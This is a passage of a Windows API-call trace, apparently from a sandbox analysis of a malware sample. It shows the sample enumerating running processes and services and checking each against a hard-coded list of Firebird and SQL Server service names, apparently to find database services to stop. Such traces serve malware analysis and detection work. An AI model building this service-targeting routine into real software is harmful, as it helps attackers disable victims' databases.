th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0184.246] lstrlenW (lpString="cmd.exe") returned 7 [0184.247] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.247] lstrlenW (lpString="conhost.exe") returned 11 [0184.248] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0184.248] lstrlenW (lpString="sc.exe") returned 6 [0184.248] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.250] lstrlenW (lpString="conhost.exe") returned 11 [0184.250] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0184.251] lstrlenW (lpString="WMIADAP.exe") returned 11 [0184.251] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0184.252] lstrlenW (lpString="LogonUI.exe") returned 11 [0184.252] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0184.253] lstrlenW (lpString="mode.com") returned 8 [0184.253] Process32NextW (in: hSnapshot=0x358, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0184.253] CloseHandle (hObject=0x358) returned 1 [0184.253] Sleep (dwMilliseconds=0x1f4) [0185.544] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ef20 [0185.545] EnumServicesStatusExW (in: hSCManager=0x74ef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0185.546] GetLastError () returned 0xea [0185.546] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x774a70 [0185.546] EnumServicesStatusExW (in: hSCManager=0x74ef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x774a70, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x774a70, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0185.548] CloseServiceHandle (hSCObject=0x74ef20) returned 1 [0185.548] lstrlenW (lpString="Appinfo") returned 7 [0185.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0185.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0185.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0185.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0185.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0185.548] lstrlenW (lpString="AppXSvc") returned 7 [0185.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0185.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0185.548] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0185.548] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0185.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0185.548] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0185.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0185.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0185.548] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0185.548] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0185.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0185.548] lstrlenW (lpString="Audiosrv") returned 8 [0185.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0185.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0185.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0185.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0185.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0185.549] lstrlenW (lpString="BFE") returned 3 [0185.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0185.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0185.549] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0185.549] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0185.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0185.549] lstrlenW (lpString="BITS") returned 4 [0185.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0185.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0185.549] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0185.549] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0185.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0185.549] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0185.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0185.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0185.549] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0185.549] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0185.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0185.549] lstrlenW (lpString="CDPSvc") returned 6 [0185.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0185.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0185.549] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0185.550] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0185.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0185.550] lstrlenW (lpString="ClickToRunSvc") returned 13 [0185.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0185.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0185.550] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0185.550] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0185.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0185.550] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0185.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0185.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0185.550] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0185.550] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0185.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0185.550] lstrlenW (lpString="CryptSvc") returned 8 [0185.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0185.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0185.550] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0185.550] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0185.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0185.550] lstrlenW (lpString="DcomLaunch") returned 10 [0185.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0185.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0185.550] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0185.550] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0185.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0185.550] lstrlenW (lpString="Dhcp") returned 4 [0185.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0185.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0185.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0185.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0185.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0185.551] lstrlenW (lpString="Dnscache") returned 8 [0185.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0185.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0185.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0185.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0185.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0185.551] lstrlenW (lpString="DoSvc") returned 5 [0185.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0185.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0185.551] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0185.551] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0185.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0185.551] lstrlenW (lpString="DPS") returned 3 [0185.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0185.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0185.551] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0185.551] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0185.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0185.551] lstrlenW (lpString="DusmSvc") returned 7 [0185.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0185.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0185.551] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0185.551] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0185.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0185.552] lstrlenW (lpString="EventLog") returned 8 [0185.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0185.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0185.552] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0185.552] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0185.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0185.552] lstrlenW (lpString="EventSystem") returned 11 [0185.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0185.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0185.552] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0185.552] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0185.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0185.552] lstrlenW (lpString="FontCache") returned 9 [0185.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0185.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0185.552] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0185.552] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0185.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0185.552] lstrlenW (lpString="gpsvc") returned 5 [0185.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0185.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0185.552] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0185.552] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0185.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0185.552] lstrlenW (lpString="iphlpsvc") returned 8 [0185.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0185.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0185.553] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0185.553] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0185.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0185.553] lstrlenW (lpString="KeyIso") returned 6 [0185.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0185.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0185.553] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0185.553] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0185.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0185.553] lstrlenW (lpString="LanmanServer") returned 12 [0185.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0185.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0185.553] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0185.553] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0185.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0185.553] lstrlenW (lpString="LanmanWorkstation") returned 17 [0185.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0185.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0185.553] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0185.553] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0185.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0185.553] lstrlenW (lpString="lfsvc") returned 5 [0185.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0185.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0185.553] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0185.553] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0185.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0185.553] lstrlenW (lpString="lmhosts") returned 7 [0185.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0185.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0185.554] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0185.554] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0185.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0185.554] lstrlenW (lpString="LSM") returned 3 [0185.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0185.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0185.554] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0185.888] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0185.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0185.889] lstrlenW (lpString="MpsSvc") returned 6 [0185.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0185.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0185.889] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0185.889] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0185.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0185.889] lstrlenW (lpString="NcbService") returned 10 [0185.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0185.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0185.889] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0185.889] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0185.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0185.889] lstrlenW (lpString="netprofm") returned 8 [0185.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0185.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0185.889] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0185.889] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0185.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0185.889] lstrlenW (lpString="NlaSvc") returned 6 [0185.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0185.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0185.889] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0185.889] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0185.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0185.889] lstrlenW (lpString="nsi") returned 3 [0185.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0185.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0185.889] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0185.890] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0185.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0185.890] lstrlenW (lpString="PcaSvc") returned 6 [0185.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0185.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0185.890] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0185.890] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0185.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0185.890] lstrlenW (lpString="PlugPlay") returned 8 [0185.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0185.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0185.890] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0185.890] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0185.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0185.890] lstrlenW (lpString="Power") returned 5 [0185.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0185.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0185.890] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0185.890] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0185.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0185.890] lstrlenW (lpString="ProfSvc") returned 7 [0185.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0185.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0185.890] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0185.890] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0185.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0185.890] lstrlenW (lpString="RpcEptMapper") returned 12 [0185.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0185.891] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0185.891] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0185.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0185.891] lstrlenW (lpString="RpcSs") returned 5 [0185.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0185.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0185.891] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0185.891] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0185.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0185.891] lstrlenW (lpString="SamSs") returned 5 [0185.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0185.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0185.891] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0185.891] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0185.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0185.891] lstrlenW (lpString="Schedule") returned 8 [0185.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0185.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0185.891] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0185.891] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0185.891] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0185.891] lstrlenW (lpString="SecurityHealthService") returned 21 [0185.891] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.891] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0185.891] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0185.892] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0185.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0185.892] lstrlenW (lpString="SENS") returned 4 [0185.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0185.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0185.892] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0185.892] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0185.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0185.892] lstrlenW (lpString="ShellHWDetection") returned 16 [0185.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0185.892] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0185.892] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0185.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0185.892] lstrlenW (lpString="Spooler") returned 7 [0185.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0185.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0185.892] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0185.892] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0185.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0185.892] lstrlenW (lpString="sppsvc") returned 6 [0185.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0185.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0185.892] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0185.892] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0185.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0185.892] lstrlenW (lpString="SSDPSRV") returned 7 [0185.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0185.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0185.893] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0185.893] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0185.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0185.893] lstrlenW (lpString="StateRepository") returned 15 [0185.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0185.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0185.893] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0185.893] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0185.893] 